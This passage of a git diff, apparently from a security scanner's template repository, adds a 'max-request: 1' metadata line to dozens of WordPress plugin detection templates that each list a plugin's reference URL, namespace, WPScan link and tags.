     - https://wordpress.org/plugins/google-analytics-dashboard-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-dashboard-for-wp
     wpscan: https://wpscan.com/plugin/google-analytics-dashboard-for-wp
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
index ad238445fc..8074ac337e 100644
--- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
+++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-analytics-for-wordpress/
   metadata:
+    max-request: 1
     plugin_namespace: google-analytics-for-wordpress
     wpscan: https://wpscan.com/plugin/google-analytics-for-wordpress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
index 7161671960..b9de0ee313 100644
--- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
+++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-listings-and-ads/
   metadata:
+    max-request: 1
     plugin_namespace: google-listings-and-ads
     wpscan: https://wpscan.com/plugin/google-listings-and-ads
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml
index 2678f603c6..7b0f188ff7 100644
--- a/http/technologies/wordpress/plugins/google-site-kit.yaml
+++ b/http/technologies/wordpress/plugins/google-site-kit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-site-kit/
   metadata:
+    max-request: 1
     plugin_namespace: google-site-kit
     wpscan: https://wpscan.com/plugin/google-site-kit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
index 20d947a5d1..898e4de56d 100644
--- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
+++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/google-sitemap-generator/
   metadata:
+    max-request: 1
     plugin_namespace: google-sitemap-generator
     wpscan: https://wpscan.com/plugin/google-sitemap-generator
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml
index 22ee97b51f..4a76856a69 100644
--- a/http/technologies/wordpress/plugins/gtranslate.yaml
+++ b/http/technologies/wordpress/plugins/gtranslate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gtranslate/
   metadata:
+    max-request: 1
     plugin_namespace: gtranslate
     wpscan: https://wpscan.com/plugin/gtranslate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml
index 3f4c6c8936..b321ca63eb 100644
--- a/http/technologies/wordpress/plugins/gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: gutenberg
     wpscan: https://wpscan.com/plugin/gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
index fa1bb64115..2b42c9f80c 100644
--- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
+++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/happy-elementor-addons/
   metadata:
+    max-request: 1
     plugin_namespace: happy-elementor-addons
     wpscan: https://wpscan.com/plugin/happy-elementor-addons
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
index da63d1cbf6..dbea07a6da 100644
--- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-code-manager/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-code-manager
     wpscan: https://wpscan.com/plugin/header-footer-code-manager
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
index f94e7f6494..17a8f220cf 100644
--- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml
+++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer-elementor/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer-elementor
     wpscan: https://wpscan.com/plugin/header-footer-elementor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml
index 95d2aa5f16..956a08b32d 100644
--- a/http/technologies/wordpress/plugins/header-footer.yaml
+++ b/http/technologies/wordpress/plugins/header-footer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/header-footer/
   metadata:
+    max-request: 1
     plugin_namespace: header-footer
     wpscan: https://wpscan.com/plugin/header-footer
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml
index af8193b875..5a570b9077 100644
--- a/http/technologies/wordpress/plugins/health-check.yaml
+++ b/http/technologies/wordpress/plugins/health-check.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/health-check/
   metadata:
+    max-request: 1
     plugin_namespace: health-check
     wpscan: https://wpscan.com/plugin/health-check
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml
index 8d7e45818b..4ecac0cd92 100644
--- a/http/technologies/wordpress/plugins/hello-dolly.yaml
+++ b/http/technologies/wordpress/plugins/hello-dolly.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/hello-dolly/
   metadata:
+    max-request: 1
     plugin_namespace: hello-dolly
     wpscan: https://wpscan.com/plugin/hello-dolly
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
index ed3967db7b..e50f58cef8 100644
--- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml
+++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/host-webfonts-local/
   metadata:
+    max-request: 1
     plugin_namespace: host-webfonts-local
     wpscan: https://wpscan.com/plugin/host-webfonts-local
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml
index 2ff5adba86..031bb48563 100644
--- a/http/technologies/wordpress/plugins/imagify.yaml
+++ b/http/technologies/wordpress/plugins/imagify.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imagify/
   metadata:
+    max-request: 1
     plugin_namespace: imagify
     wpscan: https://wpscan.com/plugin/imagify
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml
index 9099f3c0a5..3cdcf3da93 100644
--- a/http/technologies/wordpress/plugins/imsanity.yaml
+++ b/http/technologies/wordpress/plugins/imsanity.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/imsanity/
   metadata:
+    max-request: 1
     plugin_namespace: imsanity
     wpscan: https://wpscan.com/plugin/imsanity
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
index 1ee0e67542..c222bc9d4a 100644
--- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
+++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/insert-headers-and-footers/
   metadata:
+    max-request: 1
     plugin_namespace: insert-headers-and-footers
     wpscan: https://wpscan.com/plugin/insert-headers-and-footers
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml
index 1778552d75..9c6e3e6d2e 100644
--- a/http/technologies/wordpress/plugins/instagram-feed.yaml
+++ b/http/technologies/wordpress/plugins/instagram-feed.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/instagram-feed/
   metadata:
+    max-request: 1
     plugin_namespace: instagram-feed
     wpscan: https://wpscan.com/plugin/instagram-feed
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
index 7ba81036cf..66b7d6a363 100644
--- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/intuitive-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: intuitive-custom-post-order
     wpscan: https://wpscan.com/plugin/intuitive-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml
index 24fc3e3295..a36016562d 100644
--- a/http/technologies/wordpress/plugins/iwp-client.yaml
+++ b/http/technologies/wordpress/plugins/iwp-client.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/iwp-client/
   metadata:
+    max-request: 1
     plugin_namespace: iwp-client
     wpscan: https://wpscan.com/plugin/iwp-client
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml
index 3e89505574..8033aacbc6 100644
--- a/http/technologies/wordpress/plugins/jetpack-boost.yaml
+++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack-boost/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack-boost
     wpscan: https://wpscan.com/plugin/jetpack-boost
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml
index e701e365ba..e4017b1a0a 100644
--- a/http/technologies/wordpress/plugins/jetpack.yaml
+++ b/http/technologies/wordpress/plugins/jetpack.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/jetpack/
   metadata:
+    max-request: 1
     plugin_namespace: jetpack
     wpscan: https://wpscan.com/plugin/jetpack
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml
index c0cc5400a8..53d6d393bd 100644
--- a/http/technologies/wordpress/plugins/kadence-blocks.yaml
+++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kadence-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: kadence-blocks
     wpscan: https://wpscan.com/plugin/kadence-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml
index 22687bcffe..c286e9a14f 100644
--- a/http/technologies/wordpress/plugins/kirki.yaml
+++ b/http/technologies/wordpress/plugins/kirki.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/kirki/
   metadata:
+    max-request: 1
     plugin_namespace: kirki
     wpscan: https://wpscan.com/plugin/kirki
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml
index b69d3d5bfe..364e3cd71e 100644
--- a/http/technologies/wordpress/plugins/leadin.yaml
+++ b/http/technologies/wordpress/plugins/leadin.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/leadin/
   metadata:
+    max-request: 1
     plugin_namespace: leadin
     wpscan: https://wpscan.com/plugin/leadin
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
index 7975a57702..4fcccbfc33 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts-reloaded/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts-reloaded
     wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
index ff4cef94d7..3fbc714d3b 100644
--- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml
+++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/limit-login-attempts/
   metadata:
+    max-request: 1
     plugin_namespace: limit-login-attempts
     wpscan: https://wpscan.com/plugin/limit-login-attempts
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml
index a8903697b0..c49b506979 100644
--- a/http/technologies/wordpress/plugins/litespeed-cache.yaml
+++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/litespeed-cache/
   metadata:
+    max-request: 1
     plugin_namespace: litespeed-cache
     wpscan: https://wpscan.com/plugin/litespeed-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml
index 3f141c4476..dfcaf6f71b 100644
--- a/http/technologies/wordpress/plugins/loco-translate.yaml
+++ b/http/technologies/wordpress/plugins/loco-translate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loco-translate/
   metadata:
+    max-request: 1
     plugin_namespace: loco-translate
     wpscan: https://wpscan.com/plugin/loco-translate
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml
index 5355e988a2..61be246fee 100644
--- a/http/technologies/wordpress/plugins/loginizer.yaml
+++ b/http/technologies/wordpress/plugins/loginizer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/loginizer/
   metadata:
+    max-request: 1
     plugin_namespace: loginizer
     wpscan: https://wpscan.com/plugin/loginizer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
index 53d409fb68..50d2e6630b 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-woocommerce
     wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
index 0e908a9580..8d71f7bde9 100644
--- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
+++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailchimp-for-wp/
   metadata:
+    max-request: 1
     plugin_namespace: mailchimp-for-wp
     wpscan: https://wpscan.com/plugin/mailchimp-for-wp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml
index aeb1875c57..5e1f97086e 100644
--- a/http/technologies/wordpress/plugins/mailpoet.yaml
+++ b/http/technologies/wordpress/plugins/mailpoet.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mailpoet/
   metadata:
+    max-request: 1
     plugin_namespace: mailpoet
     wpscan: https://wpscan.com/plugin/mailpoet
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml
index 7c15702305..d87d456a8c 100644
--- a/http/technologies/wordpress/plugins/maintenance.yaml
+++ b/http/technologies/wordpress/plugins/maintenance.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/maintenance/
   metadata:
+    max-request: 1
     plugin_namespace: maintenance
     wpscan: https://wpscan.com/plugin/maintenance
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml
index 5ce87e6c71..aa9153241e 100644
--- a/http/technologies/wordpress/plugins/mainwp-child.yaml
+++ b/http/technologies/wordpress/plugins/mainwp-child.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/mainwp-child/
   metadata:
+    max-request: 1
     plugin_namespace: mainwp-child
     wpscan: https://wpscan.com/plugin/mainwp-child
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml
index c342e6b45a..09641796a3 100644
--- a/http/technologies/wordpress/plugins/malcare-security.yaml
+++ b/http/technologies/wordpress/plugins/malcare-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/malcare-security/
   metadata:
+    max-request: 1
     plugin_namespace: malcare-security
     wpscan: https://wpscan.com/plugin/malcare-security
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml
index e95041f555..28b70d09bf 100644
--- a/http/technologies/wordpress/plugins/megamenu.yaml
+++ b/http/technologies/wordpress/plugins/megamenu.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/megamenu/
   metadata:
+    max-request: 1
     plugin_namespace: megamenu
     wpscan: https://wpscan.com/plugin/megamenu
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml
index 879a0d1c12..b43c10ed7a 100644
--- a/http/technologies/wordpress/plugins/members.yaml
+++ b/http/technologies/wordpress/plugins/members.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/members/
   metadata:
+    max-request: 1
     plugin_namespace: members
     wpscan: https://wpscan.com/plugin/members
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml
index 985f5d373a..eb7e78bc7f 100644
--- a/http/technologies/wordpress/plugins/meta-box.yaml
+++ b/http/technologies/wordpress/plugins/meta-box.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/meta-box/
   metadata:
+    max-request: 1
     plugin_namespace: meta-box
     wpscan: https://wpscan.com/plugin/meta-box
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml
index bbc305b8de..3da2ea50e1 100644
--- a/http/technologies/wordpress/plugins/ml-slider.yaml
+++ b/http/technologies/wordpress/plugins/ml-slider.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ml-slider/
   metadata:
+    max-request: 1
     plugin_namespace: ml-slider
     wpscan: https://wpscan.com/plugin/ml-slider
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml
index 7e3e4e2d7e..7a58c58f63 100644
--- a/http/technologies/wordpress/plugins/newsletter.yaml
+++ b/http/technologies/wordpress/plugins/newsletter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/newsletter/
   metadata:
+    max-request: 1
     plugin_namespace: newsletter
     wpscan: https://wpscan.com/plugin/newsletter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
index 17ea142c46..5f99b8cac8 100644
--- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
+++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextend-facebook-connect/
   metadata:
+    max-request: 1
     plugin_namespace: nextend-facebook-connect
     wpscan: https://wpscan.com/plugin/nextend-facebook-connect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
index 953e4ab3d8..b08876df04 100644
--- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml
+++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/nextgen-gallery/
   metadata:
+    max-request: 1
     plugin_namespace: nextgen-gallery
     wpscan: https://wpscan.com/plugin/nextgen-gallery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml
index 92107fa69c..3f68dffe06 100644
--- a/http/technologies/wordpress/plugins/ninja-forms.yaml
+++ b/http/technologies/wordpress/plugins/ninja-forms.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ninja-forms/
   metadata:
+    max-request: 1
     plugin_namespace: ninja-forms
     wpscan: https://wpscan.com/plugin/ninja-forms
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml
index 5e1fe4ef5c..34f9bde1d6 100644
--- a/http/technologies/wordpress/plugins/ocean-extra.yaml
+++ b/http/technologies/wordpress/plugins/ocean-extra.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ocean-extra/
   metadata:
+    max-request: 1
     plugin_namespace: ocean-extra
     wpscan: https://wpscan.com/plugin/ocean-extra
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
index 74fb3e6010..d9f645328f 100644
--- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
+++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/official-facebook-pixel/
   metadata:
+    max-request: 1
     plugin_namespace: official-facebook-pixel
     wpscan: https://wpscan.com/plugin/official-facebook-pixel
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
index b9f70ba555..8a1196fc9f 100644
--- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml
+++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/one-click-demo-import/
   metadata:
+    max-request: 1
     plugin_namespace: one-click-demo-import
     wpscan: https://wpscan.com/plugin/one-click-demo-import
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml
index 6486c02c9a..05025452b7 100644
--- a/http/technologies/wordpress/plugins/optinmonster.yaml
+++ b/http/technologies/wordpress/plugins/optinmonster.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/optinmonster/
   metadata:
+    max-request: 1
     plugin_namespace: optinmonster
     wpscan: https://wpscan.com/plugin/optinmonster
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml
index 81f58198d3..1db1b57708 100644
--- a/http/technologies/wordpress/plugins/otter-blocks.yaml
+++ b/http/technologies/wordpress/plugins/otter-blocks.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/otter-blocks/
   metadata:
+    max-request: 1
     plugin_namespace: otter-blocks
     wpscan: https://wpscan.com/plugin/otter-blocks
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml
index 3743307dbc..dafe6974f6 100644
--- a/http/technologies/wordpress/plugins/password-protected.yaml
+++ b/http/technologies/wordpress/plugins/password-protected.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/password-protected/
   metadata:
+    max-request: 1
     plugin_namespace: password-protected
     wpscan: https://wpscan.com/plugin/password-protected
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml
index a4c6980041..ba05fb1e16 100644
--- a/http/technologies/wordpress/plugins/pdf-embedder.yaml
+++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pdf-embedder/
   metadata:
+    max-request: 1
     plugin_namespace: pdf-embedder
     wpscan: https://wpscan.com/plugin/pdf-embedder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
index e085f30e5a..a038adac53 100644
--- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pinterest-for-woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: pinterest-for-woocommerce
     wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml
index adf3387ddb..7f98d822a8 100644
--- a/http/technologies/wordpress/plugins/pixelyoursite.yaml
+++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/pixelyoursite/
   metadata:
+    max-request: 1
     plugin_namespace: pixelyoursite
     wpscan: https://wpscan.com/plugin/pixelyoursite
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml
index eb6e1aaa5d..89602f4264 100644
--- a/http/technologies/wordpress/plugins/polylang.yaml
+++ b/http/technologies/wordpress/plugins/polylang.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/polylang/
   metadata:
+    max-request: 1
     plugin_namespace: polylang
     wpscan: https://wpscan.com/plugin/polylang
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml
index b3c83cd0bf..2f6513ca42 100644
--- a/http/technologies/wordpress/plugins/popup-builder.yaml
+++ b/http/technologies/wordpress/plugins/popup-builder.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/popup-builder/
   metadata:
+    max-request: 1
     plugin_namespace: popup-builder
     wpscan: https://wpscan.com/plugin/popup-builder
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml
index 96d8bd6aca..982306b13c 100644
--- a/http/technologies/wordpress/plugins/popup-maker.yaml
+++ b/http/technologies/wordpress/plugins/popup-maker.yaml
@@ -7,6 +7,7 @@ info:
